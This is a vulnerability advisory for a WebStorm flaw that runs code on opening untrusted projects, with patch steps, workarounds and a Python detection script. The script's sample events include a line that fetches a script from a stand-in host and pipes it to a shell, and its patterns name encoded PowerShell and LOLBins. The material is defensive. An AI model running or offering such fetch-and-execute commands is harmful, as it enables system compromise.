CVE-2021-31897

9.8 CRITICAL

📋 TL;DR

This vulnerability in JetBrains WebStorm allows arbitrary code execution without user confirmation when opening untrusted projects. It affects WebStorm users who open projects from untrusted sources, potentially leading to full system compromise.

💻 Affected Systems

Products:
  • JetBrains WebStorm
Versions: All versions before 2021.1
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability triggers when opening untrusted projects; default configuration is vulnerable.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete system takeover with attacker gaining full control of the development environment and potentially the underlying system.

🟠 Likely Case

Malicious code execution within the WebStorm environment, potentially leading to credential theft, data exfiltration, or lateral movement.

🟢 If Mitigated

No impact if proper version control and project source verification are implemented.

🌐 Internet-Facing: LOW - WebStorm is typically not directly internet-facing.
🏢 Internal Only: HIGH - Developers opening untrusted projects from internal sources or external repositories are at significant risk.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user interaction (opening untrusted project) but no authentication needed beyond that.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: WebStorm 2021.1 and later

Vendor Advisory: https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/

Restart Required: Yes

Instructions:

1. Open WebStorm.
2. Go to Help > Check for Updates.
3. Install WebStorm 2021.1 or later.
4. Restart WebStorm.

🔧 Temporary Workarounds

Avoid Untrusted Projects (applies to: all)

Only open projects from trusted sources; verify project integrity before opening.

Sandbox Environment (applies to: all)

Run WebStorm in a sandboxed or isolated environment when working with potentially untrusted projects.

🧯 If You Can't Patch

  • Implement strict policy prohibiting opening projects from untrusted sources
  • Use virtual machines or containers for testing untrusted projects

🔍 How to Verify

Check if Vulnerable:

Check the WebStorm version in Help > About. If the version is earlier than 2021.1, the installation is vulnerable.

Check Version:

On Windows: "C:\Program Files\JetBrains\WebStorm <version>\bin\webstorm64.exe" --version. On macOS/Linux: check the About dialog in the application.

Verify Fix Applied:

Verify version is 2021.1 or later in Help > About.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process execution from WebStorm
  • Suspicious project loading events

Network Indicators:

  • Unexpected outbound connections from WebStorm process

SIEM Query:

Process creation where parent process contains 'webstorm' and command line contains suspicious patterns
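As an added example that is not part of this page, the pseudo-query above turned into a small Python check run over constructed process-creation events. The field names, the sample events and the "suspicious" command-line patterns are assumptions and will need tuning: a build tool legitimately spawning node or npm from WebStorm is expected and must not fire.

```python
import re

# Constructed sample process-creation events in a Sysmon Event ID 1 style; not real telemetry.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\JetBrains\WebStorm 2020.3\bin\webstorm64.exe",
     "image": r"C:\Program Files\nodejs\node.exe",
     "command_line": r"node.exe node_modules\.bin\eslint src"},          # benign: linter run
    {"parent_image": r"C:\Program Files\JetBrains\WebStorm 2020.3\bin\webstorm64.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -EncodedCommand <base64-placeholder>"},
    {"parent_image": "/opt/webstorm/bin/webstorm.sh",
     "image": "/bin/sh",
     "command_line": "sh -c 'curl -s http://example.invalid/setup.sh | sh'"},
    {"parent_image": r"C:\Windows\explorer.exe",                           # not a WebStorm child
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
]

# Assumed "suspicious patterns"; the page does not define them, so treat these as a starting set.
SUSPICIOUS_PATTERNS = {
    "encoded_powershell": re.compile(r"-enc(odedcommand)?\b", re.I),
    "download_and_pipe": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", re.I),
    "lolbin": re.compile(r"\b(mshta|wscript|cscript|regsvr32|certutil)\b", re.I),
}


def parent_is_webstorm(event: dict) -> bool:
    """The page's parent-process condition: parent path contains 'webstorm' (case-insensitive)."""
    return "webstorm" in event.get("parent_image", "").lower()


def match_reasons(command_line: str) -> list[str]:
    """Names of every assumed pattern that matches the command line, in definition order."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command_line)]


def flag_events(events: list[dict]) -> list[dict]:
    """Return WebStorm child processes whose command line matched at least one pattern."""
    hits = []
    for ev in events:
        if not parent_is_webstorm(ev):
            continue
        reasons = match_reasons(ev.get("command_line", ""))
        if reasons:
            hits.append({"image": ev["image"], "command_line": ev["command_line"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(hit["image"], "->", ", ".join(hit["reasons"]))
```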

🔗 References
